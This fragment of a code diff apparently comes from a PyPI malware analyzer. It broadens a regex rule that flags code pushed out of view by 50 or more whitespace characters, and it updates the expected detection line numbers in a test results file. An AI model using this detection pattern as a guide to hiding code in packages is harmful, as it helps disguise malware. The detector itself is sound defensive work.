+319,5 @@ rules: languages: - python severity: WARNING - pattern-regex: ' {50,}[^ ]+' + pattern-either: + - pattern-regex: '[ \t\n\r\f\v]{50,}[^ \t\n\r\f\v]+' # The 50 here is the threshold for excessive spacing; more than that is considered obfuscation diff --git a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json index 218c6acbe..78b1467a2 100644 --- a/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json +++ b/tests/malware_analyzer/pypi/resources/sourcecode_samples/obfuscation/expected_results.json @@ -235,13 +235,13 @@ "detections": [ { "file": "obfuscation/excessive_spacing.py", - "start": 25, + "start": 24, "end": 25 }, { "file": "obfuscation/inline_imports.py", "start": 27, - "end": 28 + "end": 27 } ] }